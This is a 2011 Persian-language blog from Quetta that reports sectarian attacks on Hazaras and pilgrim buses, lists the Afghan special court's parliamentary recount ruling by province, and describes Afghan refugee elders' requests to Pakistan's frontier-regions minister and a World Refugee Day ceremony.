بعد از فرار تروریستان و ختم تیر اندازی مردم، پولیس و امبولانس ها به محل واقعه رسیده شهدا و زحمیان واقعه را به شفاخانه بولان منتقل نمودند. شهروندان کویته در شفاخانه بولان تجمع نموده و به نشانه اعتراض جاده های بروری و بی پاس را به روی ترافیک مسدود نمودند. حزب هزاره دموکراتیک با الفاظ شدید بالای حکومت انتقاد نموده گفته است که حکومت در تأمین امنیت شهروندان کاملاً ناکام می باشد و از حکومت خواسته است که هرچه عاجل عاملان این رویداد را دستگیر و به پنجه قانون بسپارند. حزب هزاره دموکراتیک فردا را اعتصاب ( شتر داون ) اعلام نموده و از مردم و بازاریان خواسته که اعتصاب اعلان شده را کامیاب بسازند. حزب هزاره دموکراتیک در ساعات اولیه مردم را به آرامش دعوت نمود تا از هر نوع ایجاد خشونت پرهیز کنند. شیعه کنسول و شیعه کنفرانس نیز با الفاظ شدید حمله امروز را تقبیح و از حکومت خواسته اند که تا 24 ساعت آینده عاملان این رویداد را دستگیر نمایند در غیر آن، آنها دست به اعتراضات گسترده تر خواهند زد. شیعه کنسول 60 روز و شیعه کنفرانس 7 روز را عزای عمومی در بلوچستان اعلام نموده است. بعد از ظهر امروز  اجساد تمام شهدا با حضور هزاران نفر از شهر وندان شهر کویته بخصوص مردم هزاره تاون و مهر آباد تشیع و بخاک سپرده شدند.  گفته میشود که در جاده سپینی رود دو پوسته تلاشی که مربوط به نیروهای امنیتی " ایف سی " و پولیس قرار دارد که این واقعه در میان هر دو پوسته رخ داده که فاصله محل واقعه به هردو پوسته امنیتی بیشتر از 100 متر نمی باشد و نیروهای ایف سی همه روزه بخاطر باز رسی در جاده ایستاد می شوند. مردم از بی توجهی نیروهای امنیتی در خصوص واقعه امروز و واقعات قبلی که در جاده متذکره اتفاق افتاده و منجر به کشته شدن چندین نفر از مردم هزاره گردیده شکایت دارند. گزارش ها حاکیست که چندین نفر در بر خورد های کوچه بازاری نیز زخمی شده اند. در پیوند با رویداد امروز شب گذشته نیز یک عراده موتر بس زایرین پنجابی که میخواستند به خاطر زیارت از راه کویته و تفتان به ایران بروند در سریاب رود شهر کویته مورد حمله قرار گرفتند که تعداد 7 نفر شهید و چند نفر دیگر مجروح شدند و تروریستان موفق به فرار شدند. روز گذشته در یک انفجار دیگر در ساحه مستونگ بیشتر از 80 نفر شهید و مجروح شدند که برادر زاده آقای اسلم رئیسانی نیز به شهادت رسید و جسد وی امروز در قبرستانی آبایی اش بخاک سپرده شد. 

+ نوشته شده توسط آزادگان در 2011/7/30 و ساعت 11:7 PM |
 در یک حمله تروریستی

 سه نفر از هزاره های کویته به شهادت رسیدند.

دیروز یکشنبه مورخ 19 سرطان مطابق با ۱۰جولای سال 2011 میلادی  سه نفر بنام های عاشق حسین، امجد حسین و عبدالقیوم  که هر سه شان متعلق به مردم هزاره می باشند، در سرک قمبرانی شهر کویته  توسط مردان مسلح ناشناس موتر سیکلت سوار به شهادت رسیدند.

رسانه ها گزارش داده میگویند، که حمله کنندگان بعد از تیر اندازی بالای سه نفر متذکره از ساحه موفق به فرار شدند و پولیس بعد از وقوع حادثه به محل واقعه رسیده و شهدا را در شفاخانه بولان ( بی ایم سی ) منتقل و سپس به ورثه های آنان تسلیم نموده و تحقیقات لازم را پیرامون گرفتاری عاملان این واقعه آغاز نموده اما تا کنون موفق به گرفتاری عاملان این رویداد نشده اند.

تا حال هیچ مرجع مسئولیت این حمله را برعهده نگرفته است، اما مسئولیت حملات تروریستی گذشته را  که بالای هزاره های کویته صورت می گرفت لشکر جهنگوی ( جنجگو ) بر عهده می گرفت. آگاهان امور انجام این حمله تروریستی را کار لشکر جهنگوی و فرقه گرایان تند رو می دانند.

گفته میشود که عاشق حسین و امجد حسین هر دو افسر و کارمند رسمی حکومت بودند.

در سال جاری میلادی این ششمین حمله ی تروریستی سازمان یافته می باشد که در مناطق مختلف شهر کویته بالای هزاره های این شهر صورت می گیرد که تا کنون ده ها نفر شهید و مجروح شده اند.

گزارش: مرتضی خرمی

+ نوشته شده توسط آزادگان در 2011/7/11 و ساعت 12:40 PM |

 

متن گزارش

فیصلۀ دادگاه ویژه رسیده گی به تقلب در انتخابات


محکمه اعلام نمود که ٦٢ نامزد معترض در ٢٧ ولايت، براساس شمارش مجدد، بيشترين آرا را بدست آورده و مطابق فقرۀ (١) مادۀ (٢٢) قانون انتخابات و فيصلۀ هيئت قضايى محکمه، برنده شناخته شده اند.


قرار اعلام محکمه، نامزد هاى برنده به کميسيون مستقل انتخابات معرفى ميشوند که به ولسى جرگه راه پيدا کنند و بدين ترتيب ٦٢ عضو فعلى ولسى جرگه که طبق شمارش مجدد آرا، راى کم برده اند، از ولسى جرگه خارج ميگردند.


به رويت فيصلۀ محکمه؛ در هرات شش ، در کابل پنج و در ساير ولايات از يک تا چهار نامزد معترض به ولسى جرگه راه پيدا کرده اند و زابل و بادغيس از جملۀ ولاياتى اند که بر اساس فيصلۀ محکمه، تمام اعضاى آن در ولسى جرگه بايد عوض شوند.


طبق شمارش مجدد آرا توسط هيئت و فيصلۀ محکمه، اسماى نامزدان معترضى که داخل ولسى جرگه ميشوند و اعضاى فعلى جرگه که بايد بيرون شوند، چنين شرح يافته است:


هرات در ولسى جرگه ١٧ چوکى دارد و شش نامزد جديد برنده شده است.


وکلاى جديدشامل نثاراحمد غوريانى با گرفتن ١٢٩٧٥، رحيمه جامى ١٩٩١، زرين زرين ٤٠٥٩، ناصرعطايى٤٥٢٤، وحيدطاهرى٤٤٢٢ و معروف فضلى ٤١٩٧ راى به ولسى جرگه راه يافته اند.


در عوض، وکلاى فعلى شامل انجنير منور شاه بهادرى با داشتن ٣٠٥٥، حاجى خليل احمد شهيد زاده ٣٢٣٦ ، محمد رفيق شهير ٣٩١٨، محمد عارف طيب ٢٦٠٧، احمد فرهاد مجيبى ٣٨٤٤ و سيمين بارکزى با ١٠٩٠ راى در پايين ترين آرا قرار گرفته اند.


کابل ٣٣ چوکى دارد و پنج نامزد جديد به جرگه راه يافته است.


وکلاى جديد را جميل کرزى با گرفتن ٣٥٤٢، حاجى احسان صاحب زاده ٣٣٢٩، بيدار ځاځى٣٠٩٩، عبدالقادر ځاځى وطندوست٣٠٣١ و روبينا جلالى ١٣٢٢ راى تشکيل ميدهند.


در مقابل،وکلاى فعلى ( داکتر عبيدالله کليمزى وردگ ٢٥٦٢، شريف الله کامه وال ٢٢٦٥، حفيظ منصور ٢٧٠٨، عرفان الله عرفان ٢٥١٧ ، فوزيه ناصريار گلدره يى با داشتن ٧٩١ راى پايين ترين آرا را بدست آورده اند.


غزنى ١١ چوکى دارد و ٤ نامزد جديد به ولسى جرگه راه يافته است:


وکلاى جديدشامل محمد داوود سلطانزوى ١١٠٦٣ ، عبدالحکيم دليلى١٠٤٥١، مامور عبدالجبارشلگرى ٩٣٨١ و نيازمحمد اميرى ٥٣٥٢ راى گرفته اند.


وکلاى فعلى، محمد عارف رحمانى با ٤٣٦٥، خداداد عرفانى با٤٢١٦، چمن شاه اعتمادى با ٣٥٥٧ و محمد على على زاده با ٢٦٢٣ راى در پايين ترين آرا قرار دارند.


ننگرهار ١١ چوکى دارد. ملک نذير ٤٦٧٠ و مطيع الرحمان شينوارى با ٤٣٦٤ راى به حيث وکلاى جديد برنده شده اند . حاجى پير بخش گرديوال ٤١٩٠ و انجنير سيد اکرام هم با همين تعداد راى در کمترين آرا قرار گرفته اند.


کندهار نيز ١١ چوکى دارد. حاجى محمدايوب ٦٠٠٩ ، حاجى محمد نوربا ٣٤١٧، نيازمحمدحبيب لالى٣٣٥٦ وعبدالکريم اڅکزى با ٣٠٦٣ راى برنده اعلام شده اند.


داکتر محمود خان با ٢٣١٧، حاجى محمد عمر ننگيالى ٢٧١٤، محمد نعيم لالى حميدزى ٢٥٢٣ و عطا الله جان حبيب ٢٥٣٣ راى حذف ميشوند.


بلخ ١١ چوکى دارد و محمد يوسف غضنفر با کسب ١٠٦٢١ راى به ولسى جرگه راه مى يابد و بر اين اساس محمد فرهاد عظيمى عضو فعلى ولسى جرگه در کمترين راى( ١٠٩٣٤ ) قرار گرفته است.


بادغيس چهار چوکى دارد که همۀ آنها عوض ميشوند.


رييس محمد عمر با ٧٢٨٣ ، حبيب الله قادسى٦٤٦٩، عبداللطيف جان٥٧٥٨ و خانم آزيتا رفعت با ٣٤١٨ راى ، وارد ولسى جرگه ميشوند و در مقابل، صفيه ايماق ٢٤٠٤ ، غلام سرور فايز ٣٨٨٤، محمد موسى جناب صاحب٥٣٧٣ و قاضى عبدالرحيم٣٩٤٣ راى حذف ميشوند.


زابل سه چوکى دارد و تمام وکلاى فعلى اين ولايت نيز حذف ميگردند.


وکلاى جديد: حميد الله توخى باداشتن ١٤١٣ ، حاجى اسماعيل زابلى ٩٣٤ و تورپيکى با ٤٣٣ راى برنده اعلام شدند و وکلاى فعلى: عبدالقادر قلاتوال با ٥١٩ ،زهرا توخى زابلى ٤٠٠ و عبدالحبيب انديوال با ٦١٣ راى حذف ميگردند.


لغمان چهار چوکى دارد و گل مرى لغمانى با بدست آوردن ٢٥٨٠ و عبدالهادى واحدى با گرفتن ٨٤٢٧ راى به ولسى جرگه راه پيدا کرده و در عوض، بريدجنرال نقيب الله با داشتن ٥٨١٥ و ذوفنون صافى با ٢٥٣٣ راى، در کمترين آرا قرار گرفته اند.


لوگر نيز چهار چوکى دارد و انجنير اسدالله وفابا بردن ٣١٠ راى برنده اعلام شده است ، در مقابل ،انجنير صاحب خان با ٦٦ راى در پايين ترين درجه قرار دارد.


پکتيکا چهار چوکى دارد:محمود خان سليمان خيل با ١٥٤١٣ راى و داکتر خديجه با ١٤٤٩ راى به حيث وکلاى جديد شناخته شده و سيد اسحق گيلانى با ٤٥٣٣ و ناجيه با ١٣٨٢ راى در پايين ترين آرا واقع شده اند.


جوزجان پنج چوکى دارد. روز محمد روز با برنده شدن٦١٤١ راى ،راه را براى رفتن به ولسى جرگه باز نموده و در عوض، حاجى محمد اسماعيل با ٢٧٦٩ از جرگه بيرون ميشود.


بغلان هشت چوکى دارد . عاشق الله وفا با ٦٠٦٧ راى و محمد نسيم مُدبر با ٥٤٨٧ راى به ولسى جرگه راه يافته اند و بدين ترتيب محمد ظاهر غنى زاده با ١٩٥٥ و دلاور ايماق با ٢٨٣٣ راى در پايين ترين آرا قرار گرفته اند.


سمنگان چهار چوکى دارد .احمد خان سمنگانى با ٢٠٣٧٢ ، رييس خيرالله ٥٨٢٦ و محبوبه ٢٦٢٤ راى به حيث وکلاى جديد ولسى جرگه شناخته شده اند و بدين منوال ، الحاج مخدوم مُحب الله فرقانى ٥٢٥٣، محمد طاهر زهير ٣٩٣٥ و داکتر معصومه خاورى ٢٠٠٢ راى، کمترين آرا را بدست آورده اند.


کندز نُه چوکى دارد . نور الدين بيگ با بدست آوردن ٣٨٧٥، فضل کريم ايماق ٢٨٧٨ و رييسه حسين خيل ٢١٨٠ راى برنده اعلام شده و در عوض، شايسته باز ناصرى با ٢٤٥٨ ، سيد داوود نادرى ٢٤٥٠ و داکتر فاطمه عزيز ١٦٨٤ راى ، از جرگه خارج ميشوند.


بدخشان نيز نُه چوکى دارد .څارنوال عبدالرووف با کسب ١٢٠٢٩ ، عبدالشکور واقف حکيمى ٨٦٥٤ و منيره بهارکى ٣٧٥٧ راى شامل ولسى جرگه ميشوند و عبدالولى نيازى با ٥٠٩٥، الحاج صفى الله مُسلم ٦٧٤٩ و داکتر نيلوفر ابراهيمى ٢٦٢٤ راى حذف ميگردند.


تخار هم نُه چوکى دارد و يکتن عوض ميشود.قارى محمد هاشم هيکل زاده با گرفتن ٦٢٧٤ راى برنده اعلام شده و بر اين اساس، سيد اکرام الدين معصومى ٦٠٤٨ پايين ترين راى را گرفته است.


غور شش چوکى دارد. مولوى دين محمد با گرفتن ٤٨٩٥ و فضل احمدخان ٢٥٢٠ راى برنده اعلام شده و آقاى بحر با ٨٩٧ و قربان کوهستانى با ٦٦٦ راى کمترين آرا را برده اند.


سرپل پنج چوکى دارد. حاجى پاينده محمد ٣٩٢٣ راى برده و به حيث وکيل جديد شناخته شده است. محمد حسين فهيمى با ٣٣٤٦ راى در پايين ترين آرا قرار گرفته است.


هلمند هشت چوکى دارد. معلم ميرولى با گرفتن ٢٣١٥ راى به ولسى جرگه راه يافته و در مقابل ،عبدالجبار با داشتن ١٧٩١ راى حذف ميشود.


ميدان وردگ پنج چوکى دارد. وحيدالله کليمزى با ٣٣٤٠ راى برنده اعلام شده و در برابر آن حاجى عبدالمجيد وردگ با ١٣٢٠ راى حذف ميشود.


نورستان دو چوکى دارد. نور الله معمار با ٤٥١١ راى به ولسى جرگه راه يافته و مولوى احمد الله مُوحد با ١٠٠٤ راى ، کمترين آرا را بدست آورده است.


فراه پنج چوکى دارد.عبدالولى حميدى با ٤٣١٠ و مسعود بختور با ٣٦٧٢ راى ، برنده اعلام شده و محمد سرور عثمانى فراهى با ٢١٤٩ و حاجى مامور موسى با ٢٧٥٤ راى در پايين ترين آرا قرار دارند.


فارياب نُه چوکى دارد . گل محمد پهلوان٧٩٧٥، نجيب الله سليمى ٧٧٥٠و خانم سلطنت کوهى١٤٦٩ راى را کسب کرده و در مقابل، آصفه شاداب با ١٤٢٦، محمد شاکر کارگر ٦٩٠٢ و انجنير محمد هاشم اورتاق با ٧٢٥٩ راى حذف ميشوند.


خوست پنج چوکى دارد. حيات وزير با گرفتن ٤٣٤٣ و ولى خان هيله من با ٣٢٣٦ راى به ولسى جرگه راه پيدا کرده و همايون با ٣١٠٧ و لياقت الله بابکر خيل با ١٦٠٤ راى از ولسى جرگه خارج ميگردند.


پکتيا نيز پنج چوکى دارد.انجنير دلاور طوطا خيل با ١٤١٠ راى برنده اعلام شده و محمد ابراهيم غښتلى با ٦١٨ راى ، کمترين راى را کسب کرده است.


کوچى ها ١٠ چوکى دارند. عبدالقادر کوچى با ٤٥٨٣ راى برنده شده و حاجى حيدر خان نعيم زوى با ٢٧٧٩ راى حذف ميشود.


اما هيئت قضايى محکمۀ اختصاصى ميگويدکه اين فيصله، قطعى نبوده و وکلاى فعلى ولسى جرگه که در کمترين آرا قرار گرفته اند، مى توانند استيناف طلب شوند.


طبق شمارش مجدد، در آراى ساير وکلاى فعلى ولسى جرگه نيز کاهش و افزايش به عمل آمده است، اما در نتايج تاثير گذار نمى باشد.


منبع مى افزايد که در ارقام و اعداد ولايات کاپيسا، ارزگان، نيمروز، دايکندى، کنر و پروان، چندان تغييرى رونما نشده و در نتايج سرنوشت وکلاى اين ولايات اثرگذار نمى باشد.


بر اساس بررسى هاى محکمه، در ولايات باميان و پنجشير، مشکل جدى وجود نداشت.


اين درحالى است که فيصلۀ محکمۀ اختصاصى حقوقى انتخابات دور دوم ولسى جرگه با عکس العمل شديد ولسى جرگه مواجه شده و ولسى جرگه ديروز با اکثريت آرا، استيضاح لوى څارنوال، رئيس ستره محکمه و دوعضو شوراى عالى اين محکمه را فيصله نمود؛ اما اين مقامات استيضاح را خلاف قانون دانسته و از حاضر شدن به ولسى جرگه، خوددارى نمودند.


ولسى جرگه در جلسۀ ديروزى خود، از اينکه لوى څارنوال به جرگه حاضر نشد، او را غياباً با اکثريت آرا سلب صلاحيت اعلام کرد.


اعضاى فعلى ولسى جرگه، تفاهم نموده اند که اگر محکمۀ اختصاصى، يک عضوولسى جرگه را هم خارج سازد، تمام آنها جرگه راترک نموده و دست به تظاهرات خواهند زدند.


انتخابات دور دوم ولسى جرگه، به تاريخ ٢٧ سنبلۀ سال ١٣٨٩ برگزار شد و نتايج آن در ٣ جدى همان سال، از سوى کميسيون مستقل انتخابات اعلام گرديد.


اما لوى څارنوالى، اين نتايج را غير مشروع خواند و محکمۀ اختصاصى در اوايل برج جدى سال گذشته، براساس درخواست ستره محکمه و منظورى رئيس جمهور، غرض بررسى تقلبات در انتخابات ولسى جرگه ايجاد گرديد.

 

 
(منبع تاجیک مدیا)

 

+ نوشته شده توسط آزادگان در 2011/7/5 و ساعت 12:17 PM |
 

ملاقات بزرگان مهاجرین افغانی مقیم بلوچستان با

آقای شوکت الله خان وزیر سرحدات پاکستان

 

آقای شوکت الله خان وزیر سفران ( سرحدات و مناطق مرزی ) دولت جمهوری اسلامی پاکستان وآقای حبیب الله ختک سکرتر آن وزارت و هیئت معیتی شان که طی یک سفر رسمی به ایالت بلوچستان تشریف آورده بودند، ساعت 4 عصر روز یکشنبه مورخ 12 سرطان سالجاری در هوتل سرینای شهر کویته با مسئولین اتشه، بزرگان و نمایندگان مهاجرین افغانی مقیم ایالت بلوچستان ملاقات نمودند.

در این ملاقات آقایان حاجی گلبدین، حاجی عبدالباقی، حاجی حیات خان، حاجی مستو خان، حاجی شیرین دل، سید عمر، نظر الله، محمد کریم، ظاهر خان بلوچ، حاجی معلم محمود، حاجی بنگل، حاجی محمد رسول، حاجی محمد شاه، ظریف خان، دگروال حسین شهداد زاد، ظاهر رضایی، احمد رسولی، حاجی سردار محمدخان، وارث خان، حاجی عبدالصمد خان،حاجی فیض محمد، مولوی محی الدین، حاجی عزیز الله عرب، حاجی سلام خان، حاجی دلبر، داکتر عبدالباقی، حاجی حبیب الله، ملا عبدالبشیر آخوند، خدای نظر و حاجی گل رحمن به نمایندگی از مهاجرین شهر کویته و آقای بلیزا رئیس یو ان اچ سی آر، آقای قمبر دشتی کمیشنر مهاجرین افغان و آقای میجیر فرزندعلی معاون شان شرکت داشتند.

در ابتداء جلسه آقای قمبر دشتی از تشریف آوری آقای شوکت الله خان وزیر سفران و هیئت معیتی شان و بزرگان مهاجرین را خیر مقدم گفت. سپس آقای شوکت الله خان به ایراد سخن پرداخته هدف سفرش را بازدید از مهاجرین و مؤسساتی که برای مهاجرین افغانی در ایالت بلوچستان فعالیت مینمایند، عنوان نموده گفت که وی بخاطر رسیدگی به مشکلات مهاجرین به این ایالت سفر نموده و از ملاقات با بزرگان و نمایندگان مهاجرین خرسند می باشد.

به تعقیب آن حاجی عبدالصمد خان به نمایندگی از مهاجرین اولاً تشریف آوری وزیر سفران را در شهر کویته خیر مقدم گفته صحت و سلامتی کامل برای آن و تمامی همکاران شان از خداوند بزرگ مسئلت نمود. ثانیاً از دولت جمهوری اسلامی و مردم مهمان نواز پاکستان و بخصوص مردم مهربان ایالت بلوچستان اظهار سپاس و قدر دانی نمود که مهاجرین افغان را طی سه دهه در آغوش گرم و پر محبت شان گرفته و امکانات زندگی شان را با آنان شریک ساخته اند و همچنین از همکاری افغان کمیشنری، کمیشنری عالی سازمان ملل متحد در امور پناهندگان و سایر نهاد های که مهاجرین را تا حال یاری نموده اند، نیز ابراز سپاس و امتنان نمود.  ثالثاً موصوف با توجه به مشکلات مهاجرین مقیم ایالت بلوچستان را به وزیر سفران چنین پیشنهاد نمود.

1.      بخش تعلیم و تربیه:

a.       راجستر نمودن تمام مکاتب مهاجرین افغان از طریق کمیشنری مهاجرین افغان.

b.       تمویل مالی مکاتب مهاجرین افغان مقیم شهر کویته ازطریق کمیشنری مهاجرین افغان.

c.       کمک به شاگردان بی بضاعت مکاتب از سوی کمیشنری مهاجرین افغان، یو ان اچ سی آر و مؤسسات خیریه.

d.      تعداد 6 سیت در رشته های طب، انجنیری و فارمسی کافی نبوده 20 سیت در رشته های طب، انجنیری، حقوق، اقتصاد، کمپیوتر ساینس و غیره اضافه گردد.

e.       اجازه شمولیت متعلمین مهاجرین افغان در امتحان کانکور به شکل آزاد بخاطر شمولیت آنها در دانشگاه های بلوچستان.

f.     سهم دادن فارغان مکاتب مهاجرین در سکالرشیپ های تحصیلی که سالانه از سوی دولت جمهوری اسلامی پاکستان برای وزارت تحصیلات عالی دولت جمهوری اسلامی افغانستان داده میشود.

g.       راه اندازی برنامه های آموزشی برای بلند بردن سطح معلومات معلمین مکاتب مهاجرین افغان.

h.       راه اندازی برنامه آموزش های حرفوی بمنظور مسلکی شدن مهاجرین.

2.      بخش صحی:

a.       از دیاد ادویه در کلینیک های کمپ ها ( در بسیاری کلینیک ادویه کافی وجود ندارد ).

b.       ایجاد بخش نسایی ولادی در کلینیک های که این بخش را ندارد.

c.     معاف نمودن فیس کلینیک های صحی برای مهاجرین، در صورت عدم معافیت فیس کلینیک ها از پول جمع شده مهاجرین که از سال 1996 بدینسو در بانک ذخیره می باشد، تادیه گردد.

3.      بخش امنیت:

a.       در بعضی مواقع تاجران و کسبه کاران مهاجرین در بدل پول اختطاف می شوند که امنیت آنان باید تأمین شود.

b.       به نیروهای ایف سی و پولیس آموزش داده شود، تا مهاجرینی که دارنده کارت می باشند مورد اذیت و آزار قرار نگیرد.

c.       در بعضی از مناطق مهاجر نشین شهر کویته امنیت وجود ندارد، که امنیت شان باید تأمین گردد.

4.      متفرقه:

a.     فراهم نمودن سه نوع امکانات خيلی مهم از طريق کارت مهاجرت که مجدداً تقاضا گرديده است. ۱- لايسنس راننده گی، ۲- باز نمودن حساب بانکي ۳- راجستر نمودن سيم کارت موبايل.

b.       صدور راه داری ممکن به مهاجرين حامل کارت مهاجرت غرض بازديد از فاميل ها و ديگر موارد عاجل به داخل کشور.

5.      حج:

حج، یکی از فرایض دینی همه ی ما و شماست. مهاجرین بخاطر رفتن به مکه معظمه همه ساله به مشکلات زیاد مواجه می باشند، اگر برای مهاجرین یک سهمیه مشخص در نظر گرفته شود، مهاجرین از رفتن به بیت الله شریف محروم نمی مانند.

6.      آب آشامیدنی:

در بسیاری از کمپ ها آب آشامیدنی وجود ندارد که بایست مرفوع گردد.

7.      خانواده های بی بضاعت و بی سرپرست، افراد معلول و معیوب:

      کمک ماهوار به خانواده های بی بضاعت و بی سرپرست، افراد معلول و معیوب مهاجرین که هیچگونه در آمد  مالی ندارند از سوی مؤسسات خیریه و دولت پاکستان.

آقای حاجی عبدالصمد خان در اخیر از وزیر سفران  تقاضا نمود که بخاطر دستگیری و کمک به مهاجرین آنان را باردیگر مورد نوازش خویش قرار داده ممنون سازند.

بعد از پیشنهادات موصوف، آقایان حاجی عبدالباقی خان در مورد کمک به مکاتب و خصوصاً لیسه ها، شریف الله از کمپ های لورالایی در مورد کمبود ادویه کلینیک ها، حاجی بنگل از کمپ مالگه گی در مورد اعمار دیوارهای استنادی کمپ متذکره بخاطر جلوگیری از سرا زیر شدن سیلاب در داخل کمپ، حاجی مستو خان در مورد رفع مشکلات آب آشامیدنی، حاجی محمد رسول در مورد جلوگیری از اختطاف تاجران و عدم امنیت تاجران مهاجرین، حاجی اختر محمد در مورد اهمیت ندادن کارتهای مهاجرت از سوی پولیس و نیروهای امنیتی، مرتضی خرمی معاون اتشه امور مهاجرین در مورد عدم اجازه انتقال وسایط نقلیه، ماشین آلات و مواشی عودت کنندگان حین عودت به داخل افغانستان از سوی کشور میزبان، حاجی عزیز الله در مورد اقامه و اجازه نامه کار برای تاجران برای انتقال اموال تجارتی بنام خود آنان، حاجی معلم محمود از کمپ لیجی کاریز در مورد ممانعت بخاطر مدغم شدن کلینیک های مهاجرین با کلینیک های مردم محل، داکتر عبدالباقی از مغل آباد شهر کویته در مورد از دیاد بیماری هپاتایتس در میان مهاجرین و عدم همکاری شفاخانه ها برای پذیرش و علاج بیماران مصاب به این بیماری صحبت نمودند و همچنین آقای امداد الله عزیز اتشه امور مهاجرین و عودت کنندگان کویته از وزیر سفران تقاضا نمودم که برای فارغان صنوف دوازدهم مکاتب مهاجرین اجازه داده شود تا در امتحانات کانکور برای شمولیت در دانشگاه های بلوچستان بطور آزادانه شرکت نمایند.

آقای شوکت الله خان وزیر سفران بعد از شنیدن پیشنهادات مهاجرین به افغان کمیشنری هدایت داد طی ده روز تمام پیشنهادات مهاجرین را که قابل اجرا می باشد، اجرا نموده و متباقی آنها را در دستور کار خویش قرار داده  و با ارگانهای ذیربط در میان گذاشته و از اجراآت کاری خویش شخصاً به وی اطمینان دهد و همچنین از حاجی عبدالصمد خان خواست که بخاطر حل دوامدار مشکلات مهاجرین با وی در تماس بوده و از نتایج آن وی را اطمینان دهد.

همچنین آقای بلیزا رئیس – یو ان اچ سی آر  - راجع به پول موجوده مهاجرین که از طریق کلینیک ها از سال 1996 بدینسو جمع آوری گردیده گفت که صلاحیت تصمیم گیری آن بمنظور حل مشکلات کلینیک های صحی کمپ ها مربوط به کمیته های صحی بوده و این موضوع را با آنان مطرح خواهد کرد.

کار جلسه بعد از صرف عصریه که از سوی کمیشنری مهاجرین افغان تهیه گردیده بود خاتمت یافت.

تهیه کننده گزارش: مرتضی خرمی

+ نوشته شده توسط آزادگان در 2011/7/4 و ساعت 3:5 PM |
خبر بد از شهر کویته:

در یک حمله تروریستی  امروز ۲ نفر

شهید و ۹ نفر دیگر زخمی شدند!

متاسفانه امروز بازهم حوالی ساعت پنج بعد از ظهر یک عراده موتر بس که زایرین را از شهر کویته به ایران انتقال میداد  در ساحه هزار گنجی شهر کویته مورد حمله تروریستان قرار گرفت.

به اساس گزارش رسانه ها - در حمله امروز تعداد ۲ نفر از سر نشینان بس متذکره شهید و ۹ نفر دیگر زخمی شده است. امبولانس های طبی و نیروهای امنیتی پولیس بعد از وقوع این حمله تروریستی به محل حادثه رسیده اجساد شهدا و زخمیان را به شفاخانه بولان انتقال داده اند. رسانه ها گزارش داده میگویند که تعداد سرنشینان بس حامل زایرین در حدود پنجاه نفر بوده است. در حادثه امروز یک نفر شهید از ساحه هزاره تاون - یکنفر از ساحه لورالایی و یکنفر دیگر که هویت آن تا هنوز معلوم نیست در میان شهدای این حادثه مشخص شده است. رسانه میافزاید که اکثر مجروحان حادثه ی امروز را هزاره ها تشکیل میدهد.

مردم هزاره تاون بخاطر هدیه خون برای مجروحین و تدفین شهدا در شفاخانه بولان تجمع نموده اند. احتمال می رود که مسئولیت حمله امروز را نیز لشکر جهنگوی بپذیرد.

طبق گزارش رسانه ها چندی قبل نیز یک عراده بس حامل زایرین در مسیر راه کویته - کراچی مورد حمله مردان مسلح ناشناس قرار گرفت که در نتیجه ۳ نفر شهید و چهار نفر دیگر مجروح شدند.

از سال ۱۹۹۸ تا کنون صدها نفر از مردم هزاره و تشییع در حملات متعدد انتحاری و قتل های هدفمندانه بطور انفرادی و جمعی توسط لشکر جهنگوی در شهر کویته کشته شده و امسال نسبت به سالهای قبل شدت بیشتر یافته است.

جزئیات بیشتر این خبر بعداْ نشر خواهد شد.

ادامه گزارش:

در این حادثه اسامی عبدالحسن و رحیم شاه شهید و جلیل احمد، نادرشاه،حاجی عبدالله خان،شیرعلی،فیض الله،سرور، قربان علی، قنبرعلی و عبدالاحد شدیداً زخمی شده اند. رسانه ها گفته اند که حالات یک تعداد از زخمی ها وخیم می باشد. هزاره دموکراتیک پارتی، مجلس وحدت المسلمین و هزاره جرگه وقوع این حمله را شدیداً تقبیح نموده و مجلس وحدت المسلمین سه روز را عزای عمومی اعلان نموده است. زخمی های حادثه به رسانه ها گفته اند که حمله کنندگان ملبث با لباس لیویز بودند و در چند قدمی بس تانک پولیس و ایف سی نیز قرار داشت که آنها هیچگونه تحرکی بخاطر دستگیری و یا از بین بردن تروریستان از خود نشان ندادند. پولیس شهر کویته گفته است که قبلاً بس های زایرین قبل از حرکت شان به سمت تفتان مارا در جریان قرار میداد اما دیروز از زمان و مکان حرکت شان برای ما اطلاع نداده بودند. مجلس وحدت المسلمین، هزاره جرگه و هزاره دموکراتیک پارتی از حکومت خواسته اند هرچه عاجل عاملین حادثه را دستگیر و به پنجه قانون بسپارند، در غیر آن جوانان ما از برداشتن جنازه هایشان خسته شده و صبرو تحمل شان را از دست داده اند و ما مانع آنها شده ایم که یک روز عدالت حکمفرما خواهد شد و این برای حکومت شرم آوراست که از گرفتار نمودن یک گروه خورد تروریستی که جان و مال مردم را به خطر انداخته است عاجز مانده است.

گزارش از: م - خرمی

+ نوشته شده توسط آزادگان در 2011/6/22 و ساعت 8:50 PM |

از روز جهانی مهاجرت در کویته تجلیل بعمل آمد!

امروز دوشنبه مورخ 20 جون سال جاری که مصادف است به روز جهانی مهاجرت، این روز تاریخی با همکاری مالی کمیشنری عالی سازمان ملل متحد در امور پناهندگان، مؤسسه ویس و همکاری مستقیم اتشه امور مهاجرین و عودت کنندگان و مؤسسات همکار با مهاجرین افغان در هوتل سرینای شهر کویته تجلیل گردید.

در این محفل رئیس و اعضای یو ان اچ سی آر، هوم سکرتر حکومت بلوچستان، کمیشنر  و معاون کمیشنر مهاجرین افغان، مسئول سیاسی و سرپرست جنرال قونسلگری جمهوری اسلامی افغانستان، معاون و پرسونل اتشه امور مهاجرین و عودت کنندگان، مسئول و پرسونل مؤسسه ویس، مسئولین و پرسونل مؤسسات و ادارت همکار، جمعی از بزرگان مهاجرین شهر کویته، مسئولین و شاگردان مکاتب مهاجرین شرکت ورزیده بودند.

کار رسمی محفل ساعت 10 قبل از ظهر به وقت محلی با تلاوت آیات چند از کلام مجید آغاز گردید. سپس شاگردان مکاتب هزاره تاون سرود میهنی و خوش آمدید به مهمانان را اجرا نمودند. بعد از آن سرود پر افتخار ملی کشور ما نیز پخش و همه ی حاضرین در جا ایستاده شده و شاگردان مکاتب پرچم زیبای افغانستان را در فضای سالون به اهتزاز در آوردند. بعد از اجرای سرود ملی، آقای اوزیی بلیزا رئیس یو ان اچ سی آر به سخنرانی پرداخته و از شستمین سالروز جهانی مهاجرت به عنوان یک روز تاریخی در جهان یاد نموده و از میزبانی کشور پاکستان در قبال پذیرش مهاجرین افغان در سالیان متمادی اظهار سپاس و قدردانی بعمل آورده و روز جهانی مهاجرت را به حاضرین تبریک و تهنیت گفت.

به تعقیب آن آقای نسیم لهری کمیشنر شهرکویته نیز روز جهانی مهاجرت را به حاضرین تبریک گفته و پاکستان را میزبان میلیونها مهاجر افغان خوانده گفت که آنان به میزبانی شان افتخار میورزند.

